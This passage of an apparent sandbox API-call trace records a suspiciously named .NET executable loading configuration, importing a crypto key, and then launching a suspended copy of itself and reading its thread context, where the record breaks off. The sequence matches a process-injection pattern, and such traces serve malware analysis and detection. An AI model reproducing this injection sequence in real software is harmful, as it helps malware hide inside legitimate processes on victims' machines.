0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10044 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10045 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10046 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10047 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10048 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10084 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10085 start_va = 0x74470000 end_va = 0x74482fff monitored = 0 entry_point = 0x74471d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 10619 start_va = 0x23a0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 10620 start_va = 0x5090000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 10621 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 10622 start_va = 0x4f40000 end_va = 0x4f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 10623 start_va = 0x51b0000 end_va = 0x52affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 10624 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Thread: id = 66 os_tid = 0x534 [0254.897] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0258.464] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x43df3c, nSize=0x80 | out: lpBuffer="") returned 0x0 [0258.468] GetEnvironmentVariableW (in: lpName="COR_PROFILER", lpBuffer=0x43e360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0258.468] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x43e360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0258.527] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e7a0 | out: phkResult=0x43e7a0*=0x0) returned 0x2 [0258.527] RegCloseKey (hKey=0x80000002) returned 0x0 [0258.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x43ea24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0258.545] IsAppThemed () returned 0x1 [0258.550] CoTaskMemAlloc (cb=0xf0) returned 0x7cf288 [0258.550] CreateActCtxA (pActCtx=0x43ef48) returned 0x7cf47c [0258.652] CoTaskMemFree (pv=0x7cf288) [0258.659] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc102 [0258.660] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc103 [0258.698] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", nBufferLength=0x105, lpBuffer=0x43ea30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", lpFilePart=0x0) returned 0x2e [0259.237] GetCurrentProcess () returned 0xffffffff [0259.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ebe8 | out: TokenHandle=0x43ebe8*=0x228) returned 1 [0259.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x43e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0259.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x43ebe0 | out: lpFileInformation=0x43ebe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0259.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x43e66c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0259.247] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x43ebe8 | out: lpFileInformation=0x43ebe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0259.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x43e608, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0259.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb20) returned 1 [0259.251] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x22c [0259.251] GetFileType (hFile=0x22c) returned 0x1 [0259.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43eb1c) returned 1 [0259.251] GetFileType (hFile=0x22c) returned 0x1 [0259.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x43de58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0259.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x43debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0259.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e0fc) returned 1 [0259.396] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x43e3c0 | out: lpFileInformation=0x43e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0259.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e0f8) returned 1 [0259.479] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x43e28c | out: pfEnabled=0x43e28c) returned 0x0 [0259.484] CryptGetDefaultProviderW (in: dwProvType=0x18, pdwReserved=0x0, dwFlags=0x1, pszProvName=0x0, pcbProvName=0x43df5c | out: pszProvName=0x0, pcbProvName=0x43df5c) returned 1 [0259.519] CryptAcquireContextW (in: phProv=0x43dfbc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x43dfbc*=0x7d1ee0) returned 1 [0259.634] GetFileSize (in: hFile=0x22c, lpFileSizeHigh=0x43ebdc | out: lpFileSizeHigh=0x43ebdc*=0x0) returned 0x8c8e [0259.635] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eb98, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43eb98*=0x1000, lpOverlapped=0x0) returned 1 [0259.656] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43ea48, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43ea48*=0x1000, lpOverlapped=0x0) returned 1 [0259.657] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e8fc, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e8fc*=0x1000, lpOverlapped=0x0) returned 1 [0259.657] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e8fc, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e8fc*=0x1000, lpOverlapped=0x0) returned 1 [0259.658] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e8fc, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e8fc*=0x1000, lpOverlapped=0x0) returned 1 [0259.658] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e834, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e834*=0x1000, lpOverlapped=0x0) returned 1 [0259.660] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e9a0, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e9a0*=0x1000, lpOverlapped=0x0) returned 1 [0259.660] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e894, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e894*=0x1000, lpOverlapped=0x0) returned 1 [0259.660] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e894, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e894*=0xc8e, lpOverlapped=0x0) returned 1 [0259.660] ReadFile (in: hFile=0x22c, lpBuffer=0x24c0258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43e958, lpOverlapped=0x0 | out: lpBuffer=0x24c0258*, lpNumberOfBytesRead=0x43e958*=0x0, lpOverlapped=0x0) returned 1 [0259.661] CloseHandle (hObject=0x228) returned 1 [0259.661] GetCurrentProcess () returned 0xffffffff [0259.661] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ed34 | out: TokenHandle=0x43ed34*=0x228) returned 1 [0259.662] CloseHandle (hObject=0x228) returned 1 [0259.662] GetCurrentProcess () returned 0xffffffff [0259.663] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ed34 | out: TokenHandle=0x43ed34*=0x228) returned 1 [0259.663] CloseHandle (hObject=0x228) returned 1 [0259.665] GetCurrentProcess () returned 0xffffffff [0259.665] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ebe8 | out: TokenHandle=0x43ebe8*=0x228) returned 1 [0259.665] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe.config" (normalized: "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x43ebe0 | out: lpFileInformation=0x43ebe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0259.666] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe.config", nBufferLength=0x105, lpBuffer=0x43e66c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe.config", lpFilePart=0x0) returned 0x35 [0259.666] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe.config" (normalized: "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x43ebe8 | out: lpFileInformation=0x43ebe8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0259.666] CloseHandle (hObject=0x228) returned 1 [0259.667] GetCurrentProcess () returned 0xffffffff [0259.667] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ed34 | out: TokenHandle=0x43ed34*=0x228) returned 1 [0259.667] CloseHandle (hObject=0x228) returned 1 [0259.668] GetCurrentProcess () returned 0xffffffff [0259.668] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43ed34 | out: TokenHandle=0x43ed34*=0x228) returned 1 [0259.669] CloseHandle (hObject=0x228) returned 1 [0259.682] GetCurrentProcess () returned 0xffffffff [0259.682] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43eb4c | out: TokenHandle=0x43eb4c*=0x228) returned 1 [0259.684] CloseHandle (hObject=0x228) returned 1 [0259.684] GetCurrentProcess () returned 0xffffffff [0259.684] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43eb64 | out: TokenHandle=0x43eb64*=0x228) returned 1 [0259.687] CloseHandle (hObject=0x228) returned 1 [0259.702] GetSystemMetrics (nIndex=75) returned 1 [0259.709] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0259.724] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x754f0000 [0259.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x43ee30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15 [0259.725] GetProcAddress (hModule=0x754f0000, lpProcName="AddDllDirectory") returned 0x76ac1e91 [0259.726] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x74490000 [0259.776] AdjustWindowRectEx (in: lpRect=0x43ef98, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x43ef98) returned 1 [0259.782] GetCurrentProcess () returned 0xffffffff [0259.782] GetCurrentThread () returned 0xfffffffe [0259.782] GetCurrentProcess () returned 0xffffffff [0259.782] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x43eeb0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x43eeb0*=0x26c) returned 1 [0259.783] GetCurrentThreadId () returned 0x534 [0259.788] GetCurrentActCtx (in: lphActCtx=0x43ee10 | out: lphActCtx=0x43ee10*=0x0) returned 1 [0259.789] ActivateActCtx (in: hActCtx=0x7cf47c, lpCookie=0x43ee20 | out: hActCtx=0x7cf47c, lpCookie=0x43ee20) returned 1 [0259.790] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76b00000 [0259.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x43ecc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW7q-¼\x0eÌDþ¸t\x94ñC", lpUsedDefaultChar=0x0) returned 14 [0259.791] GetProcAddress (hModule=0x76b00000, lpProcName="DefWindowProcW") returned 0x778425dd [0259.791] GetStockObject (i=5) returned 0x1900015 [0259.795] GetModuleHandleW (lpModuleName=0x0) returned 0xc30000 [0259.797] CoTaskMemAlloc (cb=0x5c) returned 0x7c3a98 [0259.797] RegisterClassW (lpWndClass=0x43ecb8) returned 0xc105 [0259.797] CoTaskMemFree (pv=0x7c3a98) [0259.797] GetModuleHandleW (lpModuleName=0x0) returned 0xc30000 [0259.798] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.34f5582_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xc30000, lpParam=0x0) returned 0x1013c [0259.798] SetWindowLongW (hWnd=0x1013c, nIndex=-4, dwNewLong=2005149149) returned 82250646 [0259.799] GetWindowLongW (hWnd=0x1013c, nIndex=-4) returned 2005149149 [0259.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x43e5cc | out: phkResult=0x43e5cc*=0x270) returned 0x0 [0259.804] RegQueryValueExW (in: hKey=0x270, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x43e5ec, lpData=0x0, lpcbData=0x43e5e8*=0x0 | out: lpType=0x43e5ec*=0x0, lpData=0x0, lpcbData=0x43e5e8*=0x0) returned 0x2 [0259.804] RegQueryValueExW (in: hKey=0x270, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x43e5ec, lpData=0x0, lpcbData=0x43e5e8*=0x0 | out: lpType=0x43e5ec*=0x0, lpData=0x0, lpcbData=0x43e5e8*=0x0) returned 0x2 [0259.804] RegCloseKey (hKey=0x270) returned 0x0 [0259.807] SetWindowLongW (hWnd=0x1013c, nIndex=-4, dwNewLong=82250686) returned 2005149149 [0259.807] GetWindowLongW (hWnd=0x1013c, nIndex=-4) returned 82250686 [0259.807] GetWindowLongW (hWnd=0x1013c, nIndex=-16) returned 113311744 [0259.808] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc106 [0259.808] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013c, Msg=0x24, wParam=0x0, lParam=0x43e8a4) returned 0x0 [0259.808] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc107 [0259.808] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013c, Msg=0x81, wParam=0x0, lParam=0x43e898) returned 0x1 [0259.809] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013c, Msg=0x83, wParam=0x0, lParam=0x43e884) returned 0x0 [0259.809] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013c, Msg=0x1, wParam=0x0, lParam=0x43e898) returned 0x0 [0259.809] GetClientRect (in: hWnd=0x1013c, lpRect=0x43e600 | out: lpRect=0x43e600) returned 1 [0259.809] GetWindowRect (in: hWnd=0x1013c, lpRect=0x43e600 | out: lpRect=0x43e600) returned 1 [0259.811] GetParent (hWnd=0x1013c) returned 0x0 [0259.811] DeactivateActCtx (dwFlags=0x0, ulCookie=0x180e0001) returned 1 [0259.842] EtwEventRegister () returned 0x0 [0259.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0259.851] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe.config" (normalized: "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x43ed78 | out: lpFileInformation=0x43ed78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0259.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43eab0) returned 1 [0260.070] CryptImportKey (in: hProv=0x7d1f68, pbData=0x7e3b48, dwDataLen=0x14, hPubKey=0x0, dwFlags=0x1, phKey=0x43d670 | out: phKey=0x43d670*=0x7a2138) returned 1 [0260.072] CryptSetKeyParam (hKey=0x7a2138, dwParam=0x1, pbData=0x7efb88, dwFlags=0x0) returned 1 [0260.129] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0x5d4a5750, Data2=0x3e19, Data3=0x4c0b, Data4=([0]=0x9e, [1]=0x88, [2]=0x1d, [3]=0x12, [4]=0xc5, [5]=0x53, [6]=0xf6, [7]=0x24))) returned 0x0 [0260.281] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0xa8245a59, Data2=0xc60d, Data3=0x4f73, Data4=([0]=0x90, [1]=0x94, [2]=0x19, [3]=0x94, [4]=0xe0, [5]=0xb1, [6]=0xf6, [7]=0xf9))) returned 0x0 [0260.303] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0xec6607d7, Data2=0xaabc, Data3=0x4e36, Data4=([0]=0xbe, [1]=0xd0, [2]=0xf0, [3]=0x37, [4]=0xd9, [5]=0xe3, [6]=0xcc, [7]=0x4))) returned 0x0 [0260.316] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0x1d8190c0, Data2=0x28bb, Data3=0x49e4, Data4=([0]=0xa9, [1]=0x2b, [2]=0x36, [3]=0x1c, [4]=0x21, [5]=0xb3, [6]=0x83, [7]=0xb8))) returned 0x0 [0260.329] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0xc0224614, Data2=0x516, Data3=0x4640, Data4=([0]=0x87, [1]=0xc3, [2]=0x8b, [3]=0x17, [4]=0x2b, [5]=0x93, [6]=0x4c, [7]=0x25))) returned 0x0 [0260.341] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0x4c7291f4, Data2=0x3182, Data3=0x40f7, Data4=([0]=0xbd, [1]=0x85, [2]=0xe3, [3]=0x25, [4]=0x15, [5]=0xac, [6]=0x9, [7]=0xaf))) returned 0x0 [0260.350] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0x668ae789, Data2=0x37ab, Data3=0x4a5c, Data4=([0]=0xb5, [1]=0x57, [2]=0x6e, [3]=0x80, [4]=0x25, [5]=0x7f, [6]=0x7b, [7]=0xb1))) returned 0x0 [0260.359] CoCreateGuid (in: pguid=0x43c8fc | out: pguid=0x43c8fc*(Data1=0x24c38849, Data2=0xec4f, Data3=0x49f8, Data4=([0]=0xbf, [1]=0x71, [2]=0x3, [3]=0xb, [4]=0xfa, [5]=0x32, [6]=0x7a, [7]=0x3c))) returned 0x0 [0260.375] CreateProcessAsUserW (in: hToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", lpCommandLine="\"C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x43ee94*(cb=0x24, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x24, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43ef88 | out: lpCommandLine="\"C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe\"", lpProcessInformation=0x43ef88*(hProcess=0x2c0, hThread=0x2bc, dwProcessId=0x33c, dwThreadId=0x340)) returned 1 [0260.388] GetThreadContext (in: hThread=0x2bc, lpContext=0x24f566c | out: lpContext=0x24f566c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0xc695ce, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, 